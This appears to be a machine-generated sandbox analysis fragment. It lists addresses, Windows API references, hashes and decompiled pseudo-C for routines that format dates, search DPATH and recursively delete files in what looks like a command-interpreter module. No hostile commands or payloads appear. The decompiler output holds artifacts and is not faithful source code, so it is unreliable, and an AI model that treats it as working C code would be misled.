                                0x4a563ac8
                                0x4a563abc
                                0x4a5660f7
                                0x4a5660fd
                                0x4a566106
                                0x4a56610d
                                0x4a566110
                                0x4a566116
                                0x4a566118
                                0x4a56611a
                                0x4a56611a
                                0x4a56611a
                                0x4a566135
                                0x4a56613b
                                0x4a56613b
                                0x4a566118
                                0x4a56613e
                                0x4a566144
                                0x4a56614a
                                0x4a566150
                                0x4a566161
                                0x4a566166
                                0x4a566168
                                0x4a56617a
                                0x4a56617a
                                0x4a566180
                                0x4a566186
                                0x4a56618c
                                0x4a56618e
                                0x4a5661e1
                                0x4a5661f8
                                0x4a5661fe
                                0x4a566203
                                0x4a566205
                                0x4a566216
                                0x4a56621c
                                0x4a566238
                                0x4a56623e
                                0x4a566244
                                0x4a566246
                                0x4a566248
                                0x4a56624a
                                0x4a56624a
                                0x4a566250
                                0x4a566256
                                0x00000000
                                0x4a566256
                                0x4a566207
                                0x4a56620d
                                0x4a56620f
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a566190
                                0x4a566190
                                0x4a566190
                                0x4a566193
                                0x4a56619a
                                0x00000000
                                0x00000000
                                0x4a56619c
                                0x4a56619c
                                0x4a56619d
                                0x4a56619d
                                0x4a56619d
                                0x4a5661a3
                                0x4a5661c1
                                0x4a5661c3
                                0x4a5661c5
                                0x4a5661c7
                                0x4a5661c9
                                0x00000000
                                0x00000000
                                0x4a5661cf
                                0x4a5661cf
                                0x4a5661cf
                                0x4a5661db
                                0x00000000
                                0x4a5661db
                                0x4a5661a5
                                0x4a5661a5
                                0x4a5661a6
                                0x4a5661a6
                                0x4a5661a6
                                0x4a5661ac
                                0x00000000
                                0x00000000
                                0x4a566190
                                0x4a566190
                                0x4a566193
                                0x4a56619a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56619a
                                0x4a566190
                                0x4a56616a
                                0x4a566170
                                0x00000000
                                0x00000000
                                0x4a566172
                                0x00000000
                                0x4a566152
                                0x4a566152
                                0x4a566152
                                0x4a566154
                                0x4a566154
                                0x4a56625c
                                0x4a56625c
                                0x4a566262
                                0x4a566264
                                0x4a56626a
                                0x4a566279
                                0x4a56627e
                                0x4a56627e
                                0x4a566281
                                0x4a566287
                                0x4a566287
                                0x4a56628d
                                0x4a56628f
                                0x4a566295
                                0x4a56629b
                                0x4a5663f5
                                0x4a5663fb
                                0x4a566401
                                0x4a56640c
                                0x4a566416
                                0x4a56641a
                                0x4a56641a
                                0x4a566426
                                0x4a56642c
                                0x00000000
                                0x4a566432
                                0x4a566438
                                0x4a56643e
                                0x00000000
                                0x00000000
                                0x4a566444
                                0x4a566458
                                0x4a56645a
                                0x00000000
                                0x4a56645a
                                0x4a56644c
                                0x4a566452
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a566452
                                0x4a5662a1
                                0x4a5662a1
                                0x4a5662a3
                                0x4a5662a4
                                0x4a5662aa
                                0x4a5662ba
                                0x4a5662ba
                                0x4a5662c1
                                0x4a56648f
                                0x4a566496
                                0x00000000
                                0x4a566496
                                0x4a5662c9
                                0x4a5662ce
                                0x4a5662d0
                                0x4a56630d
                                0x4a566314
                                0x4a56634e
                                0x4a566355
                                0x4a566367
                                0x4a56636e
                                0x4a566375
                                0x4a56637a
                                0x4a566381
                                0x4a56638a
                                0x4a56638a
                                0x4a56638e
                                0x4a566394
                                0x4a56639c
                                0x4a56639e
                                0x4a56639e
                                0x4a56639e
                                0x4a5663a4
                                0x4a5663a4
                                0x4a5663a4
                                0x4a5663a6
                                0x4a5663a6
                                0x4a5663a8
                                0x4a5663b1
                                0x4a5663b1
                                0x4a5663b7
                                0x4a5663bc
                                0x4a5663be
                                0x4a5663c0
                                0x4a5663c0
                                0x4a5663cc
                                0x4a5663ce
                                0x4a5663d3
                                0x4a5663d5
                                0x4a56649d
                                0x4a5664a2
                                0x4a5664a4
                                0x4a5664b5
                                0x00000000
                                0x4a5664b5
                                0x4a5664a6
                                0x4a5664a8
                                0x00000000
                                0x4a5663db
                                0x4a5663db
                                0x4a5663dd
                                0x4a5663df
                                0x00000000
                                0x4a5663e5
                                0x4a5663d5
                                0x4a5663aa
                                0x4a5663ad
                                0x4a5663af
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5663af
                                0x4a566357
                                0x4a56635b
                                0x4a566361
                                0x4a566363
                                0x00000000
                                0x4a566363
                                0x4a566316
                                0x4a56631d
                                0x00000000
                                0x00000000
                                0x4a56631f
                                0x4a566330
                                0x4a566336
                                0x4a56633c
                                0x4a566342
                                0x4a566344
                                0x4a566346
                                0x00000000
                                0x4a566346
                                0x4a5662e6
                                0x4a5662ec
                                0x4a5662ee
                                0x00000000
                                0x00000000
                                0x4a5662f0
                                0x4a5662f6
                                0x4a5662f8
                                0x00000000
                                0x00000000
                                0x4a5662fa
                                0x4a566300
                                0x4a566302
                                0x00000000
                                0x4a566302
                                0x4a5662ac
                                0x4a5662b2
                                0x4a5662b4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5663e6
                                0x4a5663e6
                                0x4a5663e6
                                0x4a5663f3
                                0x4a5663f3
                                0x00000000
                                0x4a5663f3
                                0x4a56629b
                                0x4a566150
                                0x00000000
                                0x4a563abc
                                0x4a566466
                                0x00000000

                                APIs
                                • SearchPathW.KERNEL32 ref: 4A5660AC
                                  • Part of subcall function 4A553B03: _get_osfhandle.MSVCRT ref: 4A553B0D
                                  • Part of subcall function 4A553B03: GetFileType.KERNEL32 ref: 4A553B17
                                • _get_osfhandle.MSVCRT ref: 4A563A4D
                                • GetFileSize.KERNEL32(00000000), ref: 4A563A51
                                • _get_osfhandle.MSVCRT ref: 4A563A66
                                • SetFilePointer.KERNEL32(00000000), ref: 4A563A6A
                                • _get_osfhandle.MSVCRT ref: 4A563AA2
                                • ReadFile.KERNEL32(00000000), ref: 4A563AAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File_get_osfhandle$PathPointerReadSearchSizeType
                                • String ID: DPATH
                                • API String ID: 1209024715-2010427443
                                • Opcode ID: 8752cf437999a891b02438e571a0f5645c1fac4075446f9558de2f647b300c8d
                                • Instruction ID: 8cd10cc5e7aa05b11ca205d3adb5cf182daa34cea825c518edeaf81ea5af9f9e
                                • Opcode Fuzzy Hash: 8752cf437999a891b02438e571a0f5645c1fac4075446f9558de2f647b300c8d
                                • Instruction Fuzzy Hash: 68E192B5D012A8ABDB359B20CE84ADDBBB8EF44760F0001D6E58DE6554DBB49EC4CF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56270D, Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 336timeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E4A56270D(intOrPtr _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v72;
				short _v328;
				signed int _v332;
				signed int _v336;
				int _v340;
				signed short _v350;
				signed short _v352;
				signed short _v354;
				struct _SYSTEMTIME _v356;
				struct _FILETIME _v364;
				struct _FILETIME _v372;
				void _v408;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				intOrPtr _t84;
				signed int _t93;
				int _t96;
				void* _t107;
				int _t109;
				int _t110;
				int _t120;
				long _t125;
				short* _t127;
				void* _t134;
				void* _t135;
				void* _t141;
				int _t149;
				void* _t155;
				signed int _t160;
				void* _t163;
				void* _t164;
				void _t165;
				int _t168;
				void _t169;
				int _t171;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t72 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t72 ^ _t176;
				_v340 = _a12;
				_v332 = 1;
				if(_a4 == 0) {
					GetSystemTime( &_v356);
					SystemTimeToFileTime( &_v356,  &_v364);
				} else {
					__ecx = 9;
					 &_v364 =  &_v408;
					__edi =  &_v408;
					__eax = memcpy( &_v408, __esi, __ecx << 2);
					__edi = __esi + __ecx;
					__edi = __esi + __ecx + __ecx;
					__ecx = 0;
					__eax = E4A5630B6( &_v408,  &_v364);
				}
				FileTimeToLocalFileTime( &_v364,  &_v372);
				FileTimeToSystemTime( &_v372,  &_v356);
				if( *0x4a574081 == 0) {
					_t171 = _v354 & 0x0000ffff;
					_t168 = _v350 & 0x0000ffff;
					_t149 = _v356 & 0x0000ffff;
					if(_a8 == 0) {
						_t160 = 0x64;
						_t59 = _t149 % _t160;
						_t166 = _t59;
						_t149 = _t59;
					}
					_t84 =  *0x4a5741d0; // 0x0
					if(_t84 != 2) {
						if(_t84 == 1) {
							_t109 = _t171;
							_t171 = _t168;
							_t168 = _t109;
						}
					} else {
						_t110 = _t149;
						_t149 = _t168;
						_t168 = _t171;
						_t171 = _t110;
					}
					if( *0x4a5740dc >= 0x20) {
						L55:
						_push(_t149);
						_push(0x4a574940);
						_push(_t168);
						_push(0x4a574940);
						E4A55179D( *0x4a5740d8,  *0x4a5740dc, L"%02d%s%02d%s%02d", _t171);
						_t149 = _v340;
						_t177 = _t177 + 0x20;
						goto L19;
					} else {
						_t107 = realloc( *0x4a5740d8, 0x40);
						_pop(_t157);
						if(_t107 == 0) {
							L45:
							_push(0);
							_push(8);
							L44:
							E4A556D44(_t157);
							_t93 = 0;
							goto L26;
						}
						 *0x4a5740d8 = _t107;
						 *0x4a5740dc = 0x20;
						goto L55;
					}
				} else {
					_v336 = _v336 & 0x00000000;
					if(GetLocaleInfoW(E4A55756D(), 0x1f,  &_v328, 0x80) == 0) {
						E4A55185A( &_v328, 0x80,  *0x4a5741cc);
					}
					_t171 =  &_v328;
					if(_v328 == 0) {
						L17:
						_t120 = E4A55756D();
						_t168 = GetDateFormatW;
						if(GetDateFormatW(_t120, 0,  &_v356,  &_v328,  *0x4a5740d8,  *0x4a5740dc) == 0 ||  *0x4a5740d8 == 0) {
							goto L1;
						} else {
							L19:
							E4A55185A( &_v72, 0x20, E4A562B93(_v352 & 0x0000ffff));
							if(_t149 == 0) {
								if(_v332 != _t149) {
									if(E4A55661C() == 0) {
										_push( *0x4a5740d8);
										_push( &_v72);
									} else {
										_push( &_v72);
										_push( *0x4a5740d8);
									}
									_push(L"%s %s ");
									_t93 = E4A5558F3();
								} else {
									_t93 = E4A5558F3("%s ",  *0x4a5740d8);
								}
								L26:
								return E4A5513A9(_t93, _t149, _v8 ^ _t176, _t166, _t168, _t171);
							}
							if(_v332 == 0 || _a8 != 1) {
								E4A55185A(_t149, _a16,  *0x4a5740d8);
							} else {
								if(E4A55661C() == 0) {
									E4A55185A(_t149, _a16,  &_v72);
									E4A5520A9(_t171, _t149, _a16, E4A5525B8);
									_push( *0x4a5740d8);
								} else {
									E4A55185A(_t149, _a16,  *0x4a5740d8);
									E4A5520A9(_t171, _t149, _a16, E4A5525B8);
									_push( &_v72);
								}
								_push(_a16);
								_push(_t149);
								E4A5520A9(_t171);
							}
							_t96 = _t149;
							_t166 = _t96 + 2;
							do {
								_t155 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t155 != 0);
							_t93 = _t96 - _t166 >> 1;
							goto L26;
						}
					} else {
						do {
							_t166 =  *_t171 & 0x0000ffff;
							if(_t166 == 0x27) {
								_v336 = 0 | _v336 == 0x00000000;
								L14:
								_t171 = _t171 + 2;
								goto L15;
							}
							if(_v336 != 0 || _t166 != 0x64 && _t166 != 0x4d) {
								goto L14;
							} else {
								_t163 = 0;
								do {
									_t163 = _t163 + 1;
									_t171 = _t171 + 2;
								} while ( *_t171 == _t166);
								_t134 = _t163 + _t163;
								_t175 = _t171 - _t134;
								if(_t163 != 1) {
									if(_t166 == 0x64) {
										_v332 = _v332 & 0x00000000;
									}
									if(_t163 <= 3) {
										_t171 = _t175 + _t134;
									} else {
										_t164 = _t134 + _t175;
										_t135 = _t164;
										_t51 = _t135 + 2; // 0x3
										_t166 = _t51;
										do {
											_t169 =  *_t135;
											_t135 = _t135 + 2;
										} while (_t169 != 0);
										_t171 = _t175 + 6;
										memmove(_t171, _t164, (_t135 - _t166 >> 1) + (_t135 - _t166 >> 1) + 2);
										_t177 = _t177 + 0xc;
									}
									goto L15;
								}
								_t141 = _t175;
								_t36 = _t141 + 2; // 0x4
								_t166 = _t36;
								do {
									_t165 =  *_t141;
									_t141 = _t141 + 2;
								} while (_t165 != 0);
								_t39 = _t175 + 2; // 0x4
								memmove(_t39, _t175, (_t141 - _t166 >> 1) + (_t141 - _t166 >> 1) + 2);
								_t177 = _t177 + 0xc;
								_t171 = _t175 + 4;
							}
							L15:
						} while ( *_t171 != 0);
						_t149 = _v340;
						goto L17;
					}
				}
				L1:
				_t157 =  &_v356;
				_t171 = GetDateFormatW(E4A55756D(), 0,  &_v356,  &_v328, 0, 0);
				if(_t171 == 0) {
					L43:
					_t125 = GetLastError();
					_push(0);
					 *0x4a574128 = _t125;
					_push(_t125);
					goto L44;
				}
				_t171 = _t171 + 1;
				_t127 = realloc( *0x4a5740d8, _t171 + _t171);
				_pop(_t157);
				if(_t127 == 0) {
					goto L45;
				}
				 *0x4a5740d8 = _t127;
				 *0x4a5740dc = _t171;
				if(GetDateFormatW(E4A55756D(), 0,  &_v356,  &_v328, _t127, _t171) != 0) {
					goto L19;
				} else {
					goto L43;
				}
			}












































                                0x4a562718
                                0x4a56271f
                                0x4a56272b
                                0x4a562731
                                0x4a56273d
                                0x4a564e4f
                                0x4a564e63
                                0x4a562743
                                0x4a562745
                                0x4a56274d
                                0x4a562753
                                0x4a56275a
                                0x4a56275a
                                0x4a56275a
                                0x4a56275a
                                0x4a56275c
                                0x4a56275c
                                0x4a56276f
                                0x4a562783
                                0x4a562790
                                0x4a564f05
                                0x4a564f0c
                                0x4a564f13
                                0x4a564f1a
                                0x4a564f22
                                0x4a564f23
                                0x4a564f23
                                0x4a564f25
                                0x4a564f25
                                0x4a564f27
                                0x4a564f2f
                                0x4a564f3e
                                0x4a564f40
                                0x4a564f42
                                0x4a564f44
                                0x4a564f44
                                0x4a564f31
                                0x4a564f31
                                0x4a564f33
                                0x4a564f35
                                0x4a564f37
                                0x4a564f37
                                0x4a564f4d
                                0x4a564f72
                                0x4a564f72
                                0x4a564f78
                                0x4a564f79
                                0x4a564f7a
                                0x4a564f8d
                                0x4a564f92
                                0x4a564f98
                                0x00000000
                                0x4a564f4f
                                0x4a564f57
                                0x4a564f5e
                                0x4a564f61
                                0x4a564efb
                                0x4a564efb
                                0x4a564efd
                                0x4a564eed
                                0x4a564eed
                                0x4a564ef4
                                0x00000000
                                0x4a564ef4
                                0x4a564f63
                                0x4a564f68
                                0x00000000
                                0x4a564f68
                                0x4a562796
                                0x4a562796
                                0x4a5627ba
                                0x4a564e7c
                                0x4a564e7c
                                0x4a5627c8
                                0x4a5627ce
                                0x4a56280e
                                0x4a56282a
                                0x4a56282f
                                0x4a56283a
                                0x00000000
                                0x4a56284d
                                0x4a56284d
                                0x4a562861
                                0x4a562868
                                0x4a564fa6
                                0x4a564fc9
                                0x4a564fd4
                                0x4a564fda
                                0x4a564fcb
                                0x4a564fcb
                                0x4a564fcc
                                0x4a564fcc
                                0x4a564fdb
                                0x4a564fe0
                                0x4a564fa8
                                0x4a564fb3
                                0x4a564fb9
                                0x4a5628a3
                                0x4a5628b1
                                0x4a5628b1
                                0x4a562875
                                0x4a56288b
                                0x4a564fed
                                0x4a564ff4
                                0x4a565021
                                0x4a56502f
                                0x4a565034
                                0x4a564ff6
                                0x4a565000
                                0x4a56500e
                                0x4a565016
                                0x4a565016
                                0x4a56503a
                                0x4a56503d
                                0x4a56503e
                                0x4a56503e
                                0x4a562890
                                0x4a562892
                                0x4a562895
                                0x4a562895
                                0x4a562899
                                0x4a56289a
                                0x4a5628a1
                                0x00000000
                                0x4a5628a1
                                0x4a5627d0
                                0x4a5627d6
                                0x4a5627d6
                                0x4a5627dd
                                0x4a564e91
                                0x4a562800
                                0x4a562801
                                0x00000000
                                0x4a562801
                                0x4a5627ea
                                0x00000000
                                0x4a5628b4
                                0x4a5628b4
                                0x4a5628b6
                                0x4a5628b6
                                0x4a5628b8
                                0x4a5628b9
                                0x4a5628be
                                0x4a5628c1
                                0x4a5628c6
                                0x4a564ea0
                                0x4a564ea2
                                0x4a564ea2
                                0x4a564eac
                                0x4a564ed8
                                0x4a564eae
                                0x4a564eae
                                0x4a564eb1
                                0x4a564eb3
                                0x4a564eb3
                                0x4a564eb6
                                0x4a564eb6
                                0x4a564eba
                                0x4a564ebb
                                0x4a564eca
                                0x4a564ece
                                0x4a564ed0
                                0x4a564ed0
                                0x00000000
                                0x4a564eac
                                0x4a5628cc
                                0x4a5628ce
                                0x4a5628ce
                                0x4a5628d1
                                0x4a5628d1
                                0x4a5628d5
                                0x4a5628d6
                                0x4a5628e4
                                0x4a5628e9
                                0x4a5628eb
                                0x4a5628ee
                                0x4a5628ee
                                0x4a562802
                                0x4a562802
                                0x4a562808
                                0x00000000
                                0x4a562808
                                0x4a5627ce
                                0x4a562696
                                0x4a5626a1
                                0x4a5626b1
                                0x4a5626b5
                                0x4a564edf
                                0x4a564edf
                                0x4a564ee5
                                0x4a564ee7
                                0x4a564eec
                                0x00000000
                                0x4a564eec
                                0x4a5626bb
                                0x4a5626c6
                                0x4a5626cd
                                0x4a5626d0
                                0x00000000
                                0x00000000
                                0x4a5626d8
                                0x4a5626ed
                                0x4a5626fd
                                0x00000000
                                0x4a562703
                                0x00000000
                                0x4a562703

                                APIs
                                • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,00002000,4A580640,74CBA9E9), ref: 4A56276F
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 4A562783
                                • GetLocaleInfoW.KERNEL32(00000000,0000001F,?,00000080), ref: 4A5627B2
                                • GetDateFormatW.KERNEL32 ref: 4A562836
                                • memmove.MSVCRT ref: 4A5628E9
                                • GetSystemTime.KERNEL32(?,00002000,4A580640,74CBA9E9), ref: 4A564E4F
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 4A564E63
                                  • Part of subcall function 4A5630B6: SystemTimeToFileTime.KERNEL32(?,00002000,?,00002000,4A580640,74CBA9E9), ref: 4A56310F
                                • realloc.MSVCRT ref: 4A564F57
                                  • Part of subcall function 4A55756D: GetUserDefaultLCID.KERNEL32(4A5627B1,0000001F,?,00000080), ref: 4A55756D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                • String ID: %02d%s%02d%s%02d$%s $%s %s
                                • API String ID: 1795611712-4023967598
                                • Opcode ID: 647125cef1193c9a9d41653c8323848e275902afaa9739f46741d5c33a0810ef
                                • Instruction ID: eb86e6ecfb930f573aadda6e8c48126c44a99b71ec2a4656354338ed96a99028
                                • Opcode Fuzzy Hash: 647125cef1193c9a9d41653c8323848e275902afaa9739f46741d5c33a0810ef
                                • Instruction Fuzzy Hash: 89B1B3B6800229EBDB219F60DF44EEA7BBCEF49310F010456E50DEA564DB359E89CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A570492, Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 326fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 69%
                                			E4A570492(void* __edi, WCHAR* _a4, intOrPtr* _a8) {
				signed int _v8;
				short _v528;
				struct _WIN32_FIND_DATAW _v1120;
				WCHAR* _v1124;
				signed int* _v1128;
				long _v1132;
				void* _v1136;
				char _v1140;
				void* __ebx;
				void* __esi;
				signed int _t84;
				intOrPtr* _t86;
				WCHAR* _t87;
				signed int _t89;
				void* _t93;
				void* _t95;
				signed int _t100;
				void* _t105;
				short* _t107;
				signed int _t109;
				signed int _t110;
				signed int _t117;
				long _t122;
				intOrPtr* _t123;
				intOrPtr* _t135;
				WCHAR* _t152;
				intOrPtr* _t159;
				intOrPtr* _t160;
				void* _t163;
				short* _t168;
				long _t173;
				short _t174;
				short _t177;
				intOrPtr _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				short* _t187;
				signed int _t191;
				void* _t192;

				_t188 = __edi;
				_t84 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t84 ^ _t191;
				_t86 = _a8;
				_t190 = _a4;
				_v1128 = _t86;
				 *_t86 = 1;
				_t87 = _t190;
				_v1124 = _t190;
				_t187 =  &(_t87[1]);
				do {
					_t174 =  *_t87;
					_t87 =  &(_t87[1]);
				} while (_t174 != 0);
				_t89 = _t87 - _t187;
				_t173 = _t89 >> 1;
				_v1132 = _t173;
				if(_t89 != 0) {
					_push(__edi);
					if(_t173 + 3 <= 0x104) {
						_t190 = FindFirstFileW;
						_t93 = FindFirstFileW(FindFirstFileW,  &_v1120);
						if(_t93 != 0xffffffff) {
							FindClose(_t93);
						} else {
							_v1120.dwReserved0 = _v1120.dwReserved0 & 0x00000000;
							_v1120.dwFileAttributes = 0x10;
						}
						if((_v1120.dwFileAttributes & 0x00000010) == 0 || (_v1120.dwFileAttributes & 0x00000400) != 0 && (_v1120.dwReserved0 & 0x20000000) != 0) {
							L69:
							_push(_v1124);
							goto L70;
						} else {
							E4A55185A( &_v528, 0x104, _v1124);
							_t100 =  *(_v1124 + _t173 * 2 - 2) & 0x0000ffff;
							if(_t100 != 0x3a && _t100 != 0x5c) {
								E4A5520A9(_t190,  &_v528, 0x104, E4A552EC8);
								_t173 = _t173 + 1;
								_v1132 = _t173;
							}
							E4A5520A9(_t190,  &_v528, 0x104, E4A559FFC);
							_t105 = FindFirstFileW( &_v528,  &_v1120);
							_v1136 = _t105;
							if(_t105 == 0xffffffff) {
								goto L69;
							} else {
								while( *0x4a5741b4 == 0) {
									_t187 =  &(_v1120.cAlternateFileName);
									_t107 = _t187;
									_t190 =  &(_t107[1]);
									do {
										_t177 =  *_t107;
										_t107 =  &(_t107[1]);
									} while (_t177 != 0);
									_t109 = _t107 - _t190;
									_t110 = _t109 >> 1;
									if(_t109 != 0) {
										L23:
										_push(_t187);
										if(_t110 + _t173 >= 0x104) {
											 *_v1128 =  *_v1128 & 0x00000000;
											E4A556D44(_t177, 0x400023da, 2, _v1124);
											break;
										}
										_push(0x104 - _t173);
										_t190 = _t191 + _t173 * 2 - 0x20c;
										_push(_t190);
										E4A55185A();
										_t117 = _v1120.dwFileAttributes;
										_t173 = _t117;
										if((_t117 & 0x00000010) == 0) {
											if((_t117 & 0x00000001) != 0) {
												SetFileAttributesW( &_v528, _t117 & 0xfffffffe);
											}
											if(DeleteFileW( &_v528) != 0) {
												L63:
												if(FindNextFileW(_v1136,  &_v1120) == 0) {
													break;
												}
												_t173 = _v1132;
												continue;
											} else {
												_t122 = GetLastError();
												if(_t122 == 0x4d3) {
													break;
												}
												if(_t122 == 3) {
													_t152 =  &_v528;
													__imp___wcsnicmp(_t152, L"\\\\?\\", 4);
													_t192 = _t192 + 0xc;
													if(_t152 != 0 && GetFullPathNameW( &_v528, 0, 0, 0) > 0x104) {
														SetLastError(0x6f);
													}
												}
												_t123 =  &(_v1120.cAlternateFileName);
												_t187 = _t123 + 2;
												do {
													_t178 =  *_t123;
													_t123 = _t123 + 2;
												} while (_t178 != 0);
												if(_t123 == _t187) {
													L61:
													E4A556D44(_t178, 0x4000271b, 1,  &_v528);
													_t192 = _t192 + 0xc;
													L62:
													_push(0);
													_push(GetLastError());
													E4A556D44(_t178);
													SetFileAttributesW( &_v528, _t173);
													 *_v1128 =  *_v1128 & 0x00000000;
													goto L63;
												}
												 *_t190 = 0;
												_t135 =  &(_v1120.cFileName);
												_t187 = _t135 + 2;
												do {
													_t181 =  *_t135;
													_t135 = _t135 + 2;
												} while (_t181 != 0);
												_t178 = _v1132;
												if((_t135 - _t187 >> 1) + _v1132 < 0x104) {
													E4A5520A9(_t190,  &_v528, 0x104,  &(_v1120.cFileName));
													E4A556D44(_t178, 0x4000271b, 1,  &_v528);
													_t192 = _t192 + 0xc;
													 *_t190 = 0;
													E4A5520A9(_t190,  &_v528, 0x104,  &(_v1120.cAlternateFileName));
													goto L62;
												}
												E4A5520A9(_t190,  &_v528, 0x104,  &(_v1120.cAlternateFileName));
												goto L61;
											}
										}
										_t182 = E4A552EC4;
										_t159 =  &(_v1120.cFileName);
										while(1) {
											_t187 =  *_t159;
											if(_t187 !=  *_t182) {
												break;
											}
											if(_t187 == 0) {
												L30:
												_t159 = 0;
												L32:
												if(_t159 == 0) {
													goto L63;
												}
												_t183 = E4A552EBC;
												_t160 =  &(_v1120.cFileName);
												while(1) {
													_t187 =  *_t160;
													if(_t187 !=  *_t183) {
														break;
													}
													if(_t187 == 0) {
														L38:
														_t160 = 0;
														L40:
														if(_t160 == 0) {
															goto L63;
														}
														_t163 = E4A570492(0x104,  &_v528,  &_v1140);
														if( *0x4a5741b4 != 0) {
															goto L67;
														}
														if(_t163 != 0) {
															_t184 = _v1128;
															 *_v1128 =  *_v1128 & 0x00000000;
															if(_t163 != 0x91 || _v1140 != 0) {
																E4A556D44(_t184, 0x4000271b, 1,  &_v528);
																_t192 = _t192 + 0xc;
																_push(0);
																_push(GetLastError());
																E4A556D44(_t184);
															}
														}
														goto L63;
													}
													_t187 =  *((intOrPtr*)(_t160 + 2));
													_t49 = _t183 + 2; // 0x2e
													if(_t187 !=  *_t49) {
														break;
													}
													_t160 = _t160 + 4;
													_t183 = _t183 + 4;
													if(_t187 != 0) {
														continue;
													}
													goto L38;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L40;
											}
											_t187 =  *((intOrPtr*)(_t159 + 2));
											_t46 = _t182 + 2; // 0x5c0000
											if(_t187 !=  *_t46) {
												break;
											}
											_t159 = _t159 + 4;
											_t182 = _t182 + 4;
											if(_t187 != 0) {
												continue;
											}
											goto L30;
										}
										asm("sbb eax, eax");
										asm("sbb eax, 0xffffffff");
										goto L32;
									}
									_t187 =  &(_v1120.cFileName);
									_t168 = _t187;
									_t190 =  &(_t168[1]);
									do {
										_t177 =  *_t168;
										_t168 =  &(_t168[1]);
									} while (_t177 != 0);
									_t110 = _t168 - _t190 >> 1;
									goto L23;
								}
								L67:
								FindClose(_v1136);
								if( *0x4a5741b4 == 0) {
									goto L69;
								}
								_t95 = 0;
								goto L71;
							}
						}
					} else {
						_push(_t190);
						L70:
						_t95 = E4A570202(_t173, 0x104);
						L71:
						_pop(_t188);
						goto L72;
					}
				} else {
					_t95 = 0xa1;
					L72:
					return E4A5513A9(_t95, _t173, _v8 ^ _t191, _t187, _t188, _t190);
				}
			}










































                                0x4a570492
                                0x4a57049d
                                0x4a5704a4
                                0x4a5704a7
                                0x4a5704ac
                                0x4a5704af
                                0x4a5704b5
                                0x4a5704bb
                                0x4a5704bd
                                0x4a5704c3
                                0x4a5704c6
                                0x4a5704c6
                                0x4a5704ca
                                0x4a5704cb
                                0x4a5704d0
                                0x4a5704d4
                                0x4a5704d6
                                0x4a5704dc
                                0x4a5704e8
                                0x4a5704f3
                                0x4a570503
                                0x4a570509
                                0x4a57050e
                                0x4a570524
                                0x4a570510
                                0x4a570510
                                0x4a570517
                                0x4a570517
                                0x4a570531
                                0x4a5708cd
                                0x4a5708cd
                                0x00000000
                                0x4a570553
                                0x4a570561
                                0x4a57056c
                                0x4a570575
                                0x4a57058a
                                0x4a57058f
                                0x4a570590
                                0x4a570590
                                0x4a5705a3
                                0x4a5705b6
                                0x4a5705b8
                                0x4a5705c1
                                0x00000000
                                0x4a5705c7
                                0x4a5705c7
                                0x4a5705d4
                                0x4a5705da
                                0x4a5705dc
                                0x4a5705df
                                0x4a5705df
                                0x4a5705e3
                                0x4a5705e4
                                0x4a5705e9
                                0x4a5705eb
                                0x4a5705ed
                                0x4a570608
                                0x4a57060c
                                0x4a57060d
                                0x4a5708a2
                                0x4a5708ac
                                0x00000000
                                0x4a5708b1
                                0x4a570617
                                0x4a570618
                                0x4a57061f
                                0x4a570620
                                0x4a570625
                                0x4a57062b
                                0x4a57062f
                                0x4a570723
                                0x4a570730
                                0x4a570730
                                0x4a570745
                                0x4a57082c
                                0x4a570841
                                0x00000000
                                0x00000000
                                0x4a570843
                                0x00000000
                                0x4a57074b
                                0x4a57074b
                                0x4a570756
                                0x00000000
                                0x00000000
                                0x4a57075f
                                0x4a570763
                                0x4a57076f
                                0x4a570775
                                0x4a57077a
                                0x4a570794
                                0x4a570794
                                0x4a57077a
                                0x4a57079a
                                0x4a5707a0
                                0x4a5707a3
                                0x4a5707a3
                                0x4a5707a7
                                0x4a5707a8
                                0x4a5707b1
                                0x4a5707ef
                                0x4a5707fd
                                0x4a570802
                                0x4a570805
                                0x4a570805
                                0x4a57080d
                                0x4a57080e
                                0x4a57081d
                                0x4a570829
                                0x00000000
                                0x4a570829
                                0x4a5707b5
                                0x4a5707b8
                                0x4a5707be
                                0x4a5707c1
                                0x4a5707c1
                                0x4a5707c5
                                0x4a5707c6
                                0x4a5707cb
                                0x4a5707d9
                                0x4a57085d
                                0x4a570870
                                0x4a570877
                                0x4a57087a
                                0x4a57088c
                                0x00000000
                                0x4a57088c
                                0x4a5707ea
                                0x00000000
                                0x4a5707ea
                                0x4a570745
                                0x4a570635
                                0x4a57063a
                                0x4a570640
                                0x4a570640
                                0x4a570646
                                0x00000000
                                0x00000000
                                0x4a57064b
                                0x4a570662
                                0x4a570662
                                0x4a57066b
                                0x4a57066d
                                0x00000000
                                0x00000000
                                0x4a570673
                                0x4a570678
                                0x4a57067e
                                0x4a57067e
                                0x4a570684
                                0x00000000
                                0x00000000
                                0x4a570689
                                0x4a5706a0
